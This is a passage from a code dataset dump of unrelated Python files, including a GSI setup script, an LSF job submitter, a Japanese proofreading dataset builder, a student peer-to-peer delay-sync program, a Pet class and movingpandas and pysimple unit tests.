isinstance(cats[i], dict):\n if not isinstance(cols[i], basestring):\n msg = 'cat{0} is a dictionary so cols{0} must'.format(i+1)\n msg = '{0} be a (list of) string(s)'.format(msg)\n else:\n if not isinstance(cols[i], int):\n msg = 'cat{0} is array-like so cols{0} must'.format(i+1)\n msg = '{0} be a (list of) int(s)'.format(msg)\n if msg:\n raise TypeError(msg)\n # separate catalogs and columns again\n cat1, cat2 = cats\n cols1, cols2 = cols\n # now generate the conditions by looping through both catalogs\n #for \n","sub_path":"astro/catalogs.py","file_name":"catalogs.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"77970569","text":"# @(#) $Id$\n\"\"\"\nInstallation script for the GSI module\n\"\"\"\n#import ez_setup\n#ez_setup.use_setuptools()\n\nimport os\nimport ConfigParser\n\nfrom setuptools import setup, find_packages, Extension\n\nhere = os.path.realpath(os.path.dirname(__file__))\nsrcDir = os.path.join(here, \"src\")\n\nconfig = ConfigParser.SafeConfigParser()\nconfig.read(os.path.join(here, \"setup.cfg\"))\n\ndef findFiles(baseDir, validFileExts):\n files = []\n for t in os.walk(baseDir):\n for fileInDir in t[2]:\n for fext in validFileExts:\n fPos = len(fileInDir) - len(fext)\n if fileInDir.find(fext, fPos) == fPos:\n files.append(os.path.join(baseDir, fileInDir))\n return files\n\ndef createExtension(extName):\n extDir = os.path.join(srcDir, extName.lower())\n cFiles = [os.path.join(srcDir, \"util.c\")] + findFiles(extDir, \".c\")\n hFiles = [os.path.join(srcDir, \"util.h\")] + findFiles(extDir, \".h\")\n extraArgs = {}\n if 'Extensions' in config.sections():\n for k in config.options('Extensions'):\n extraArgs[k] = [v.strip() for v in config.get('Extensions', k).split(\" \") if v.strip()]\n for i in range(len(extraArgs[k])):\n if os.path.isfile(extraArgs[k][i]):\n extraArgs[k][i] = os.path.realpath(extraArgs[k][i])\n return Extension(\"GSI.%s\" % extName,\n cFiles,\n depends=hFiles,\n libraries=['ssl', 'crypto'],\n extra_compile_args=[\"-Wno-deprecated-declarations\", \"-std=c99\"],\n ** extraArgs\n )\n\n# Get the long description from the README file\nwith open(os.path.join(here, 'README.rst')) as f:\n long_description = f.read()\n\nsetup(\n name=\"GSI\",\n version='0.6.5',\n description=\"Python wrapper module around the OpenSSL library\",\n long_description=long_description,\n url='https://github.com/DIRACGrid/pyGSI',\n author=\"Adrian Casajus\",\n author_email=\"adria@ecm.ub.es\",\n license=\"GPLv3\",\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n 
classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n #'Topic :: GSI to python :: Grid proxy certificates', #only for non-sdst packages\n\n # Pick your license as you wish (should match \"license\" above)\n #'License :: OSI Approved :: GPLv3 License',#only for non-sdst packages\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n ],\n packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n zip_safe=False,\n #install_requires = [\"distribute>0.6\", \"pip\"],\n python_requires='>=2.7',\n py_modules=['GSI.__init__', 'GSI.tsafe', 'GSI.version'],\n ext_modules=[createExtension(extName) for extName in (\"crypto\", \"rand\", \"SSL\")]\n)\n","sub_path":"pypi_install_script/GSI-0.6.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"38778142","text":"__author__ = 'sathley'\n\nfrom . import AppacitiveObject, AppacitiveConnection, GraphNode\nimport types\n\n\ndef convert_node(node):\n return parse_graph_node(None, None, None, node)\n\n\ndef parse_graph_node(parent, name, parent_label, node):\n\n # parse article\n current = GraphNode()\n node_clone = node.copy()\n for k, __ in node.iteritems():\n if k == '__edge' or k == '__children':\n node_clone.pop(k)\n current.object = AppacitiveObject(node_clone)\n\n if parent is not None:\n edge = node.get('__edge', None)\n if edge is not None:\n edge_clone = edge.copy()\n current.connection = parse_connection(parent_label, parent.object, current.object, edge_clone)\n\n children = node.get('__children', None)\n if children is not None:\n for k, v in children.iteritems():\n if isinstance(v, types.DictionaryType):\n parse_child_nodes(k, v, current)\n\n if parent is not None:\n parent.add_child_node(name, current)\n\n return current\n\n\ndef parse_child_nodes(name, d, current):\n parent_label = d.get('parent', None)\n values = d['values']\n if isinstance(values, types.ListType):\n for value in values:\n parse_graph_node(current, name, parent_label, value)\n\n\ndef parse_connection(parent_label, parent_object, current_object, d):\n\n label = d.get('__label', None)\n relation_type = d.get('__relationtype', None)\n conn_id = int(d.get('__id', 0))\n\n connection = AppacitiveConnection(d)\n connection.relation_type = relation_type\n connection.id = conn_id\n connection.endpoint_a.label = parent_label\n connection.endpoint_a.object = parent_object\n connection.endpoint_a.objectid = parent_object.id\n\n connection.endpoint_b.label = label\n connection.endpoint_b.object = current_object\n connection.endpoint_b.objectid = current_object.id\n\n return connection","sub_path":"pyappacitive/nodehelper.py","file_name":"nodehelper.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"599002053","text":"\"\"\"\nFile: PDF_ReportApplyMain.py\nAuthors: Ryan J. Urbanowicz, Richard Zhang, Wilson Zhang\nInstitution: University of Pensylvania, Philadelphia PA\nCreation Date: 6/1/2021\nLicense: GPL 3.0\nDescription: Phase 11 of AutoMLPipe-BC (Optional)- This 'Main' script manages Phase 10 run parameters, and submits job to run locally (to run serially) or on a linux computing\n cluster (parallelized). 
This script runs PDF_ReportApplyJob.py which generates a formatted PDF summary report of key pipeline results (applying trained models to\n hold out replication data). All 'Main' scripts in this pipeline have the potential to be extended by users to submit jobs to other parallel computing frameworks\n (e.g. cloud computing).\nWarnings: Designed to be run following the completion of either AutoMLPipe-BC Phase 6 (StatsMain.py), Phase 7 (DataCompareMain.py), and/or Phase 8 (KeyFileCopyMain.py).\nSample Run Command (Linux cluster parallelized with all default run parameters):\n python PDF_ReportApplyMain.py --rep-path /Users/robert/Desktop/RepDatasets --dataset /Users/robert/Desktop/Datasets/targetData1.csv --out-path /Users/robert/Desktop/outputs --exp-name myexperiment1\nSample Run Command (Local/serial with all default run parameters):\n python PDF_ReportApplyMain.py --rep-path /Users/robert/Desktop/RepDatasets --dataset /Users/robert/Desktop/Datasets/targetData1.csv --out-path /Users/robert/Desktop/outputs --exp-name myexperiment1 --run-parallel False\n\"\"\"\n#Import required packages ---------------------------------------------------------------------------------------------------------------------------\nimport os\nimport re\nimport sys\nimport argparse\nimport time\nimport PDF_ReportApplyJob # local file import, used by the serial code path below\n\ndef main(argv):\n #Parse arguments\n parser = argparse.ArgumentParser(description=\"\")\n #No defaults\n parser.add_argument('--rep-path',dest='rep_data_path',type=str,help='path to directory containing replication or hold-out testing datasets (must have at least all features with same labels as in original training dataset)')\n parser.add_argument('--dataset',dest='data_path',type=str,help='path to target original training dataset')\n parser.add_argument('--out-path',dest='output_path',type=str,help='path to output directory')\n parser.add_argument('--exp-name', dest='experiment_name',type=str, help='name of experiment output folder (no spaces)')\n #Logistical arguments\n parser.add_argument('--run-parallel',dest='run_parallel',type=str,help='if run parallel',default=\"True\")\n parser.add_argument('--queue',dest='queue',type=str,help='specify name of parallel computing queue (uses our research groups queue by default)',default=\"i2c2_normal\")\n parser.add_argument('--res-mem', dest='reserved_memory', type=int, help='reserved memory for the job (in Gigabytes)',default=4)\n parser.add_argument('--max-mem', dest='maximum_memory', type=int, help='maximum memory before the job is automatically terminated',default=15)\n\n options = parser.parse_args(argv[1:])\n job_counter = 0\n experiment_path = options.output_path+'/'+options.experiment_name\n\n if eval(options.run_parallel):\n job_counter += 1\n submitClusterJob(experiment_path,options.rep_data_path,options.data_path,options.reserved_memory,options.maximum_memory,options.queue)\n else:\n submitLocalJob(experiment_path,options.rep_data_path,options.data_path)\n\n print(str(job_counter)+ \" job submitted in Phase 11\")\n\ndef submitLocalJob(experiment_path,rep_data_path,data_path):\n \"\"\" Runs PDF_ReportApplyJob.py locally, once. \"\"\"\n PDF_ReportApplyJob.job(experiment_path,rep_data_path,data_path)\n\ndef submitClusterJob(experiment_path,rep_data_path,data_path,reserved_memory,maximum_memory,queue):\n \"\"\" Runs PDF_ReportApplyJob.py once. Runs on a linux-based computing cluster that uses an IBM Spectrum LSF for job scheduling.\"\"\"\n job_ref = str(time.time())\n job_name = experiment_path + '/jobs/PDF_Apply_' + job_ref + '_run.sh'\n sh_file = open(job_name,'w')\n sh_file.write('#!/bin/bash\\n')\n sh_file.write('#BSUB -q '+queue+'\\n')\n sh_file.write('#BSUB -J '+job_ref+'\\n')\n sh_file.write('#BSUB -R \"rusage[mem='+str(reserved_memory)+'G]\"'+'\\n')\n sh_file.write('#BSUB -M '+str(maximum_memory)+'GB'+'\\n')\n sh_file.write('#BSUB -o ' + experiment_path+'/logs/PDF_Apply_'+job_ref+'.o\\n')\n sh_file.write('#BSUB -e ' + experiment_path+'/logs/PDF_Apply_'+job_ref+'.e\\n')\n\n this_file_path = os.path.dirname(os.path.realpath(__file__))\n sh_file.write('python ' + this_file_path + '/PDF_ReportApplyJob.py ' + experiment_path +' '+rep_data_path+' '+data_path+ '\\n')\n sh_file.close()\n os.system('bsub < ' + job_name)\n pass\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n","sub_path":"PDF_ReportApplyMain.py","file_name":"PDF_ReportApplyMain.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
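The submitClusterJob pattern above — write a `#BSUB` job script, then pipe it to `bsub` — generalizes to any command. Below is a minimal sketch of that pattern, assuming an IBM Spectrum LSF scheduler is available; the function name, queue name, memory values, and paths are hypothetical placeholders, not project defaults.

import os
import time

def submit_lsf_job(experiment_path, command, queue='example_queue',
                   reserved_memory=4, maximum_memory=15):
    job_ref = str(time.time())
    job_name = experiment_path + '/jobs/example_' + job_ref + '_run.sh'
    with open(job_name, 'w') as sh_file:
        sh_file.write('#!/bin/bash\n')
        sh_file.write('#BSUB -q ' + queue + '\n')                  # target queue
        sh_file.write('#BSUB -J ' + job_ref + '\n')                # job name
        sh_file.write('#BSUB -R "rusage[mem=' + str(reserved_memory) + 'G]"\n')
        sh_file.write('#BSUB -M ' + str(maximum_memory) + 'GB\n')  # kill threshold
        sh_file.write('#BSUB -o ' + experiment_path + '/logs/example_' + job_ref + '.o\n')
        sh_file.write('#BSUB -e ' + experiment_path + '/logs/example_' + job_ref + '.e\n')
        sh_file.write(command + '\n')                              # the actual work
    os.system('bsub < ' + job_name)  # hand the script to the scheduler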
+{"seq_id":"506520517","text":"\nimport unicodedata\nfrom proofreading_tokenizer import SC_tokenizer\n\nMODEL_NAME = 'cl-tohoku/bert-base-japanese-whole-word-masking'\n\ndef create_dataset(data_df):\n\n\ttokenizer = SC_tokenizer.from_pretrained(MODEL_NAME)\n\n\tdef check_token_count(row):\n\t\t'''\n\t\tCheck whether the tokens of the mistyped sentence and the correct sentence can be aligned.\n\t\tConditions: same number of tokens, and at most two differing tokens.\n\t\t'''\n\n\t\twrong_text_tokens = tokenizer.tokenize(row['wrong_text'])\n\t\tcorrect_text_tokens = tokenizer.tokenize(row['correct_text'])\n\t\tif len(wrong_text_tokens) != len(correct_text_tokens):\n\t\t\treturn False\n\n\t\tdiff_count = 0\n\t\tthreshold_count = 2\n\t\tfor wrong_text_token, correct_text_token in zip(wrong_text_tokens, correct_text_tokens):\n\t\t\tif wrong_text_token != correct_text_token:\n\t\t\t\tdiff_count += 1\n\t\t\t\tif diff_count > threshold_count:\n\t\t\t\t\treturn False\n\n\t\treturn True\n\n\tdef normalize(text):\n\t\t'''\n\t\tNormalize the string.\n\t\t'''\n\t\ttext = text.strip()\n\t\ttext = unicodedata.normalize('NFKC', text)\n\t\treturn text\n\n\t# Extract only the kanji misconversion samples\n\tcategory_type = 'kanji-conversion'\n\tdata_df.query('category == @category_type', inplace=True)\n\tdata_df.rename(columns={'pre_text': 'wrong_text', 'post_text': 'correct_text'}, inplace=True)\n\tdata_df['wrong_text'] = data_df['wrong_text'].map(normalize) \n\tdata_df['correct_text'] = data_df['correct_text'].map(normalize)\n\tkanji_conversion_num = len(data_df)\n\tdata_df = data_df[data_df.apply(check_token_count, axis=1)]\n\tsame_tokens_count_num = len(data_df)\n\tprint(\n\t f'- Total kanji misconversions: {kanji_conversion_num}',\n\t f'- Sentences with alignable tokens: {same_tokens_count_num}',\n\t f' ({same_tokens_count_num/kanji_conversion_num*100:.0f}% of the total)',\n\t sep = '\\n'\n\t)\n\treturn data_df[['wrong_text', 'correct_text']].to_dict(orient='records')","sub_path":"ProofReading/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"586564729","text":"def desconto(x, y):\n descontim = (x * y) / 100\n total = x - descontim\n print(f'\\nThe price with a {y}% discount is {total}')\n \nprint('Start')\n\nvalor = float(input('\\nEnter the product price: '))\nporcentagem = int(input('\\nEnter the discount to apply: '))\n\n# desconto (discount) function\ndesconto(valor, porcentagem)\n\nprint('\\nEnd')\n","sub_path":"Aula 15/Exercícios/B Ex 05.py","file_name":"B Ex 05.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
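The alignment test in check_token_count above — same token count, at most two differing tokens — is useful on its own. Here is a standalone sketch of that logic; the function name and example token sequences are made up for illustration.

def tokens_alignable(tokens_a, tokens_b, threshold=2):
    # Sequences of different lengths can never be aligned token-by-token.
    if len(tokens_a) != len(tokens_b):
        return False
    diff_count = 0
    for a, b in zip(tokens_a, tokens_b):
        if a != b:
            diff_count += 1
            if diff_count > threshold:
                return False
    return True

print(tokens_alignable(['I', 'saw', 'a', 'cat'], ['I', 'saw', 'a', 'dog']))  # True: one difference
print(tokens_alignable(['a', 'b', 'c'], ['x', 'y', 'z']))                    # False: three differences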
+{"seq_id":"317789242","text":"\"\"\" /////////////////////////////////////////////////////////\n Simple Delay Sync Service (SDSS)\n ///////////////////////////////////////////////////////// \"\"\"\n\n\"\"\" Code skeleton was provided by Computer Networks Course Teaching Assistants \"\"\"\n\"\"\" This project is a mini introduction to peer-to-peer networking. \"\"\"\n\n######################################\n#### Imports ###\n######################################\nimport sys\nimport os\nimport threading\nimport socket\nimport datetime\nfrom datetime import timezone\nimport time\nimport uuid\nimport struct\n\n\n# https://bluesock.org/~willkg/dev/ansi.html\nANSI_RESET = \"\\u001B[0m\"\nANSI_RED = \"\\u001B[31m\"\nANSI_GREEN = \"\\u001B[32m\"\nANSI_YELLOW = \"\\u001B[33m\"\nANSI_BLUE = \"\\u001B[34m\"\n\n_NODE_UUID = str(uuid.uuid4())[:8]\n\n\ndef print_yellow(msg):\n print(f\"{ANSI_YELLOW}{msg}{ANSI_RESET}\")\n\n\ndef print_blue(msg):\n print(f\"{ANSI_BLUE}{msg}{ANSI_RESET}\")\n\n\ndef print_red(msg):\n print(f\"{ANSI_RED}{msg}{ANSI_RESET}\")\n\n\ndef print_green(msg):\n print(f\"{ANSI_GREEN}{msg}{ANSI_RESET}\")\n\n\ndef get_broadcast_port():\n return 35498\n\n\ndef get_node_uuid():\n return _NODE_UUID\n\n\nclass NeighborInfo(object):\n def __init__(self, delay, last_timestamp, broadcast_count, ip=None, tcp_port=None):\n # Ip and port are optional, if you want to store them.\n self.delay = delay\n self.last_timestamp = last_timestamp\n self.broadcast_count = broadcast_count\n self.ip = ip\n self.tcp_port = tcp_port\n\n\n############################################\n####### Y O U R C O D E ########\n############################################\n\"\"\" /////////////////////\n Global Variables\n ///////////////////// \"\"\"\nport = 0\nNewPort = 0\nnode_uuid = 0\n\n# Don't change any variable's name.\n# Use this hashmap to store the information of your neighbor nodes.\nneighbor_information = {}\n# Leave the server socket as global variable.\n\n# Server TCP\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(('127.0.0.1',0)) \nserver.listen()\n\n# Broadcaster UDP\nbroadcaster = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nbroadcaster.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nbroadcaster.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\nbroadcaster.settimeout(4)\n\n\n# Send the broadcast Message Function\ndef send_broadcast_thread(port_number):\n global broadcaster\n global node_uuid\n node_uuid = get_node_uuid()\n \n while True:\n Message = str(node_uuid) + \" ON \" + str(port_number)\n Message_V2 = Message.encode(\"utf-8\")\n broadcaster.sendto(Message_V2, ('255.255.255.255', get_broadcast_port()))\n print_yellow(\"Broadcast Message is sent\")\n time.sleep(1) # Leave as is.\n pass\n\n\n# Check If Node Receives Itself Function\ndef checkIfsameNode(message):\n global node_uuid \n global neighbor_information\n if (node_uuid != message[0] and neighbor_information.get(message[0]) == None):\n #print_green(\"Added Successfully\") \n return 1\n elif (node_uuid != message[0] and neighbor_information.get(message[0]) != None):\n return 2\n else: \n #print_red(\"Ignored\") \n return 0\n\n\n# Receive the broadcast Message Function\ndef receive_broadcast_thread():\n \"\"\"\n Receive broadcasts from other nodes,\n launches a thread to 
connect to new nodes\n and exchange timestamps.\n \"\"\"\n global neighbor_information\n client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client.bind(('', get_broadcast_port()))\n\n while True:\n data, (ip, port) = client.recvfrom(4096)\n data_v2 = data.decode(\"utf-8\")\n parsed = data_v2.split(\" \")\n print(parsed)\n newnodeflag=checkIfsameNode(parsed)\n\n if(newnodeflag == 1):\n tcpClient=daemon_thread_builder(exchange_timestamps_thread,args=(parsed[0],\"127.0.0.1\",parsed[2],))\n tcpClient.start() \n tcpClient.join()\n elif(newnodeflag == 2):\n x = neighbor_information.get(parsed[0])\n neighbor_information.update({parsed[0]:NeighborInfo(x.delay,x.last_timestamp,x.broadcast_count+1)})\n if (x.broadcast_count == 9): \n neighbor_information.pop(parsed[0])\n\n print_blue(f\"RECV: {data} FROM: {ip}:{port}\")\n \n \n# TCP Server Thread Function \ndef tcp_server_thread(id, tcpPort):\n \"\"\"\n Accept connections from other nodes and send them\n this node's timestamp once they connect.\n \"\"\"\n global server\n \n # TCP Connection\n conn,adrr = server.accept()\n received_time_stamp = struct.unpack('!f', conn.recv(4096))[0]\n \n exchange = daemon_thread_builder(CalcDelay, args=(received_time_stamp, id,tcpPort ))\n exchange.start()\n exchange.join()\n\n pass\n\n\n# Exchange Timestamp Between Two Nodes Function\ndef exchange_timestamps_thread(other_uuid: str, other_ip: str, other_tcp_port: int):\n \"\"\"\n Open a connection to the other_ip, other_tcp_port\n and do the steps to exchange timestamps.\n\n Then update the neighbor_info map using other node's UUID.\n \"\"\"\n tcpserver=daemon_thread_builder(tcp_server_thread, args=(other_uuid, other_tcp_port))\n\n SENDER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n SENDER.connect((other_ip,int(other_tcp_port)))\n address = (other_ip, int(other_tcp_port))\n time_now = datetime.datetime.now().replace(tzinfo=timezone.utc).timestamp()\n SENDER.sendto(struct.pack('!f', time_now), address)\n \n tcpserver.start()\n tcpserver.join()\n SENDER.close()\n\n pass\n\n\n# Calculate Delay Function\ndef CalcDelay(sentTime, id, tcpPort):\n if(sentTime != \"\"): # Only calculate delay when there is a value received for timestamp\n Now = datetime.datetime.now().replace(tzinfo=timezone.utc).timestamp()\n Delay = abs(Now - sentTime)\n print_red(f\"Delay From Device => [ {id} ] is => {str(Delay)}ms\")\n x = NeighborInfo(Delay,Now,1)\n neighbor_information.update({id: x}) # Add New Neighbor\n pass\n \n\n# Create Threads Function\ndef daemon_thread_builder(target, args=()) -> threading.Thread:\n \"\"\"\n Use this function to make threads. 
Leave as is.\n \"\"\"\n th = threading.Thread(target=target, args=args)\n th.setDaemon(True)\n return th\n\n\n# Start Sending and Receiving Broadcast Message\ndef entrypoint():\n # Send Broadcast\n global server\n port=server.getsockname()[1]\n \n # Receive Broadcast\n receiver=daemon_thread_builder(receive_broadcast_thread)\n sender=daemon_thread_builder(send_broadcast_thread,args=(port,))\n \n sender.start()\n receiver.start()\n\n sender.join()\n receiver.join()\n\n pass\n\n \n############################################\n############################################\n\n\ndef main():\n \"\"\"\n Leave as is.\n \"\"\"\n print(\"*\" * 50)\n print_red(\"To terminate this program use: CTRL+C\")\n print_red(\"If the program blocks/throws, you have to terminate it manually.\")\n print_green(f\"NODE UUID: {get_node_uuid()}\")\n print(\"*\" * 50)\n time.sleep(2) # Wait a little bit.\n entrypoint()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"SDSS.py","file_name":"SDSS.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"378730636","text":"# This file contains the definition of the Pet class and associated methods.\n\nclass Pet(object):\n \"\"\"Represents a pet.\n \n An instance of this class contains the data to describe a pet: Its age, its\n sadness, its value, what types of food it can eat, and its needs. It also\n contains methods which grow it, check if it dies or changes dimension,\n etc., return a list of cards a player must draw. \"\"\"\n\n def __init__(self, name, needs_list, diet, age=2):\n \"\"\"Initialize the pet.\n \n Expects a string name, a list of needs, full-length and in order with\n respect to the age of the pet. Diet should be a string - omnivore,\n carnivore, or herbivore. Age should be an integer between 2 and the\n length of the needs & price lists. Defaults to age 2 if age is omitted.\n Defaults to standard pricing and aging, but if these are set to other\n values nothing should break.\"\"\"\n \n # Default pricing based on pet diet.\n carnivore_pricing = [0,0,0,3,4,5,6]\n herbivore_pricing = [0,0,0,2,3,4,5]\n omnivore_pricing = [0,0,0,1,2,3,4]\n \n # Default pet aging.\n self.aging_chart = [0,0,2,2,1,1,1,0]\n\n # Assign basic attributes.\n self.name = name\n self.needs_list = needs_list\n self.age = age\n self.misery = 0\n self.mutations = 0\n\n # Create a diet dictionary.\n diet_cases = {\n 'Omnivore': [True, True, omnivore_pricing],\n 'Carnivore': [True, False, carnivore_pricing],\n 'Herbivore': [False, True, herbivore_pricing],\n }\n\n # Set carnivore and herbivore flags.\n [self.carnivore, self.herbivore] = diet_cases.get(diet)[:2]\n\n # Set pricing based on diet defaults. 
Gets the last dictionary item\n self.pricing_chart = diet_cases.get(diet)[-1]\n\n def growUp(self, i=None):\n \"\"\"Age the pet according to its growth chart or the passed argument.\n \n If no arguments are given, ages the pet according to its growth chart.\n If an argument is given, ages the pet that many steps instead.\"\"\"\n\n if i == None:\n i = self.aging_chart[self.age]\n \n self.age += i\n\n def currentNeeds(self):\n \"\"\"Return a list of card types this pet needs based on its age.\"\"\"\n \n return self.needs_list[:self.age]\n\n def checkStatus(self):\n \"\"\"Check if the pet dies due to mutation or misery.\"\"\"\n goes_away = False\n\n if self.mutations > 1:\n goes_away = True\n \n if self.misery > self.age:\n goes_away = True\n \n return goes_away\n\n","sub_path":"pets.py","file_name":"pets.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307887140","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nimport pandas as pd\nfrom geopandas import GeoDataFrame\nfrom shapely.geometry import Point\nfrom datetime import datetime\nfrom movingpandas.trajectory_collection import TrajectoryCollection\n\n\nclass TestTrajectoryCollection:\n\n def setup_method(self):\n df = pd.DataFrame([\n {'id': 1, 'obj': 'A', 'geometry': Point(0, 0), 't': datetime(2018,1,1,12,0,0), 'val': 9},\n {'id': 1, 'obj': 'A', 'geometry': Point(6, 0), 't': datetime(2018,1,1,12,6,0), 'val': 5},\n {'id': 1, 'obj': 'A', 'geometry': Point(6, 6), 't': datetime(2018,1,1,12,10,0), 'val': 2},\n {'id': 1, 'obj': 'A', 'geometry': Point(9, 9), 't': datetime(2018,1,1,12,15,0), 'val': 4},\n {'id': 2, 'obj': 'A', 'geometry': Point(10, 10), 't': datetime(2018,1,1,12,0,0), 'val': 10},\n {'id': 2, 'obj': 'A', 'geometry': Point(16, 10), 't': datetime(2018,1,1,12,6,0), 'val': 6},\n {'id': 2, 'obj': 'A', 'geometry': Point(16, 16), 't': datetime(2018,1,2,12,10,0), 'val': 7},\n {'id': 2, 'obj': 'A', 'geometry': Point(190, 19), 't': datetime(2018,1,2,12,15,0), 'val': 3}\n ]).set_index('t')\n self.geo_df = GeoDataFrame(df, crs={'init': '31256'})\n\n def test_number_of_trajectories(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n assert len(collection) == 2\n\n def test_number_of_trajectories_min_length(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj', min_length=100)\n assert len(collection) == 1\n\n def test_number_of_trajectories_min_length_never_reached(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj', min_length=1000)\n assert len(collection) == 0\n\n def test_split_by_date(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n collection = collection.split_by_date(mode='day')\n assert len(collection) == 3\n\n def test_get_trajectory(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n assert collection.get_trajectory(1).id == 1\n assert collection.get_trajectory(1).obj_id == 'A'\n assert collection.get_trajectory(2).id == 2\n assert collection.get_trajectory(3) is None\n\n def test_filter(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n assert len(collection.filter('obj', 'A')) == 2\n assert len(collection.filter('obj', 'B')) == 0\n\n def test_get_min_and_max(self):\n collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n assert collection.get_min('val') == 2\n assert collection.get_max('val') == 10\n\n def test_get_start_locations(self):\n 
collection = TrajectoryCollection(self.geo_df, 'id', obj_id_col='obj')\n locs = collection.get_start_locations(columns=['val'])\n assert len(locs) == 2\n assert locs.iloc[0].geometry in [Point(0, 0), Point(10, 10)]\n assert locs.iloc[0].traj_id in [1, 2]\n assert locs.iloc[0].obj_id == 'A'\n assert locs.iloc[0].val in [9, 10]\n assert locs.iloc[1].geometry in [Point(0, 0), Point(10, 10)]\n\n","sub_path":"movingpandas/tests/test_trajectory_collection.py","file_name":"test_trajectory_collection.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"149783961","text":"### Normalize the data matrix and add labels\r\n\r\nfrom sklearn import preprocessing\r\n\r\n#x = df.values[:,1:14] #returns a numpy array\r\n#x = df.values\r\n#min_max_scaler = preprocessing.MinMaxScaler()\r\n#x_scaled = min_max_scaler.fit_transform(x)\r\n#df_normalize = pd.DataFrame(x_scaled)\r\n#\r\n##print(df.head(n=10))\r\n#df_normalize['score_all'] = score_all\r\n\r\n#\r\nx2 = df2.values\r\nmin_max_scaler2 = preprocessing.MinMaxScaler()\r\nx_scaled2 = min_max_scaler2.fit_transform(x2)\r\ndf2_normalize = pd.DataFrame(x_scaled2)\r\n\r\n#print(df.head(n=10))\r\n#df2_normalize['score_all'] = score_all","sub_path":"normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"310184176","text":"import unittest\nfrom typing import *\n\nimport pandas as pd\n\nfrom pysimple.utils import flatten_iter, df2dict, split_list\n\n\nclass FlattenIterTestCase(unittest.TestCase):\n \"\"\"Test utils.flatten_iter() function\"\"\"\n\n def test_output_is_iterator(self):\n \"\"\"Test if flatten_iter() returns iterator\"\"\"\n outp = flatten_iter([[1, 2]])\n self.assertTrue(isinstance(outp, Iterable))\n\n def test_output_is_valid(self):\n \"\"\"Test if flatten_iter() returns expected output\"\"\"\n inp = [[1, 2], [3, 4]]\n expected = [1, 2, 3, 4]\n actual = list(flatten_iter(inp))\n self.assertEqual(expected, actual)\n\n def test_iter_input(self):\n \"\"\"Test if flatten_iter() works with iterators as input\"\"\"\n inp = [range(1, 3), range(3, 5)]\n expected = set(range(1, 5))\n actual = set(flatten_iter(inp))\n self.assertEqual(expected, actual)\n\n def test_empty_input(self):\n \"\"\"Test if flatten_iter() works with empty list as input\"\"\"\n inp = []\n expected = []\n actual = list(flatten_iter(inp))\n self.assertEqual(expected, actual)\n\n\nclass Df2DictTestCase(unittest.TestCase):\n \"\"\"Test utils.df2dict() function\"\"\"\n\n def test_output_is_valid(self):\n \"\"\"Test if df2dict() returns expected output\"\"\"\n expected = [{'a': 1, 'b': 2}, {'a': 2, 'b': 3}]\n inp = pd.DataFrame(expected)\n actual = df2dict(inp)\n self.assertEqual(expected, actual)\n\n def test_empty_input(self):\n \"\"\"Test if df2dict() works with empty DataFrame as input\"\"\"\n expected = []\n inp = pd.DataFrame([])\n actual = df2dict(inp)\n self.assertEqual(expected, actual)\n\n\nclass SplitListTestCase(unittest.TestCase):\n \"\"\"Test utils.split_list() function\"\"\"\n\n def test_output_is_iterator(self):\n \"\"\"Test if split_list() returns iterator\"\"\"\n outp = split_list([1, 2, 3], split_size=1)\n self.assertTrue(isinstance(outp, Iterable))\n\n def test_splits_arg(self):\n \"\"\"Test if split_list() returns expected output for splits arg\"\"\"\n inp = [1, 2, 3, 4, 5]\n # Split positions\n splits = [0, 2, 4]\n expected = [[], [1, 2], [3, 4], 
